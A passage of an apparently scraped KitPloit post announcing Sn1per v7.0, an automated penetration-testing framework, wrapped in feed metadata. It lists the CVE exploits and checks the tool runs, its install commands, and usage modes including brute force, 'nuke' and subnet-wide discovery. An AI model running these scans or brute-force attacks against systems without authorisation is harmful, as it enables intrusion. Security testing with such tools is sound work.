* Microsoft IIS WebDav ScStoragePathFromUrl Overflow CVE-2017-7269 \n * ManageEngine Desktop Central 9 FileUploadServlet ConnectionId Vulnerability CVE-2015-8249 \n * Shellshock Bash Shell remote code execution CVE-2014-6271 \n * HeartBleed OpenSSL Detection CVE-2014-0160 \n * MS12-020: Vulnerabilities in Remote Desktop Could Allow Remote Code Execution (2671387) \n * Tomcat Application Manager Default Ovwebusr Password Vulnerability CVE-2009-3843 \n * MS08-067 Microsoft Server Service Relative Path Stack Corruption \n * Webmin File Disclosure CVE-2006-3392 \n * VsFTPd 2.3.4 Backdoor \n * ProFTPd 1.3.3C Backdoor \n * MS03-026 Microsoft RPC DCOM Interface Overflow \n * DistCC Daemon Command Execution \n * JBoss Java De-Serialization \n * HTTP Writable Path PUT/DELETE File Access \n * Apache Tomcat User Enumeration \n * Tomcat Application Manager Login Bruteforce \n * Jenkins-CI Enumeration \n * HTTP WebDAV Scanner \n * Android Insecure ADB \n * Anonymous FTP Access \n * PHPMyAdmin Backdoor \n * PHPMyAdmin Auth Bypass \n * OpenSSH User Enumeration \n * LibSSH Auth Bypass \n * SMTP User Enumeration \n * Public NFS Mounts \n \n** KALI LINUX INSTALL: ** \n\n \n \n bash install.sh\n\n \n** UBUNTU/DEBIAN/PARROT INSTALL: ** \n\n \n \n bash install_debian_ubuntu.sh\n\n \n** DOCKER INSTALL: ** \n\n \n \n docker build Dockerfile\n\n \n** USAGE: ** \n\n \n \n [*] NORMAL MODE\n sniper -t|--target <TARGET>\n \n [*] NORMAL MODE + OSINT + RECON + FULL PORT SCAN + BRUTE FORCE\n sniper -t|--target <TARGET> -o|--osint -re|--recon -fp|--fullportonly -b|--bruteforce\n \n [*] STEALTH MODE + OSINT + RECON\n sniper -t|--target <TARGET> -m|--mode stealth -o|--osint -re|--recon\n \n [*] DISCOVER MODE\n sniper -t|--target <CIDR> -m|--mode discover -w|--workspace <WORSPACE_ALIAS>\n \n [*] FLYOVER MODE\n sniper -t|--target <TARGET> -m|--mode flyover -w|--workspace <WORKSPACE_ALIAS>\n \n [*] AIRSTRIKE MODE\n sniper -f|--file /full/path/to/targets.txt -m|--mode airstrike\n \n [*] NUKE MODE WITH TARGET LIST, BRUTEFORCE ENABLED, FULLPORTSCAN ENABLED, OSINT ENABLED, RECON ENABLED, WORKSPACE & LOOT ENABLED\n sniper -f--file /full/path/to/targets.txt -m|--mode nuke -w|--workspace <WORKSPACE_ALIAS>\n \n [*] SCAN ONLY SPECIFIC PORT\n sniper -t|--target <TA RGET> -m port -p|--port <portnum>\n \n [*] FULLPORTONLY SCAN MODE\n sniper -t|--target <TARGET> -fp|--fullportonly\n \n [*] PORT SCAN MODE\n sniper -t|--target <TARGET> -m|--mode port -p|--port <PORT_NUM>\n \n [*] WEB MODE - PORT 80 + 443 ONLY!\n sniper -t|--target <TARGET> -m|--mode web\n \n [*] HTTP WEB PORT HTTP MODE\n sniper -t|--target <TARGET> -m|--mode webporthttp -p|--port <port>\n \n [*] HTTPS WEB PORT HTTPS MODE\n sniper -t|--target <TARGET> -m|--mode webporthttps -p|--port <port>\n \n [*] WEBSCAN MODE\n sniper -t|--target <TARGET> -m|--mode webscan\n \n [*] ENABLE BRUTEFORCE\n sniper -t|--target <TARGET> -b|--bruteforce\n \n [*] ENABLE LOOT IMPORTING INTO METASPLOIT\n sniper -t|--target <TARGET>\n \n [*] LOOT REIMPORT FUNCTION\n sniper -w <WORKSPACE_ALIAS> --reimport\n \n [*] LOOT REIMPORTALL FUNCTION\n sniper -w <WORKSPACE_ALIAS& gt; --reimportall\n \n [*] DELETE WORKSPACE\n sniper -w <WORKSPACE_ALIAS> -d\n \n [*] DELETE HOST FROM WORKSPACE\n sniper -w <WORKSPACE_ALIAS> -t <TARGET> -dh\n \n [*] SCHEDULED SCANS'\n sniper -w <WORKSPACE_ALIAS> -s daily|weekly|monthly'\n \n [*] SCAN STATUS\n sniper --status\n \n [*] UPDATE SNIPER\n sniper -u|--update\n\n \n** MODES: ** \n\n\n * ** NORMAL: ** Performs basic scan of targets and open ports using both active and passive checks for optimal performance. \n * ** STEALTH: ** Quickly enumerate single targets using mostly non-intrusive scans to avoid WAF/IPS blocking. \n * ** FLYOVER: ** Fast multi-threaded high level scans of multiple targets (useful for collecting high level data on many hosts quickly). \n * ** AIRSTRIKE: ** Quickly enumerates open ports/services on multiple hosts and performs basic fingerprinting. To use, specify the full location of the file which contains all hosts, IPs that need to be scanned and run ./sn1per /full/path/to/targets.txt airstrike to begin scanning. \n * ** NUKE: ** Launch full audit of multiple hosts specified in text file of choice. Usage example: ./sniper /pentest/loot/targets.txt nuke. \n * ** DISCOVER: ** Parses all hosts on a subnet/CIDR (ie. 192.168.0.0/16) and initiates a sniper scan against each host. Useful for internal network scans. \n * ** PORT: ** Scans a specific port for vulnerabilities. Reporting is not currently available in this mode. \n * ** FULLPORTONLY: ** Performs a full detailed port scan and saves results to XML. \n * ** WEB: ** Adds full automatic web application scans to the results (port 80/tcp & 443/tcp only). Ideal for web applications but may increase scan time significantly. \n * ** WEBPORTHTTP: ** Launches a full HTTP web application scan against a specific host and port. \n * ** WEBPORTHTTPS: ** Launches a full HTTPS web application scan against a specific host and port. \n * ** WEBSCAN: ** Launches a full HTTP & HTTPS web application scan against via Burpsuite and Arachni. \n \n** SAMPLE REPORT: ** \n[ https://gist.github.com/1N3/8214ec2da2c91691bcbc ](<https://gist.github.com/1N3/8214ec2da2c91691bcbc> \"https://gist.github.com/1N3/8214ec2da2c91691bcbc\" ) \n \n \n\n\n** [ Download Sn1per ](<https://github.com/1N3/Sn1per> \"Download Sn1per\" ) **\n", "edition": 26, "modified": "2019-05-12T13:09:05", "published": "2019-05-12T13:09:05", "id": "KITPLOIT:7013881512724945934", "href": "http://www.kitploit.com/2019/05/sn1per-v70-automated-pentest-framework.html", "title": "Sn1per v7.0 - Automated Pentest Framework For Offensive Security Experts", "type": "kitploit", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}]}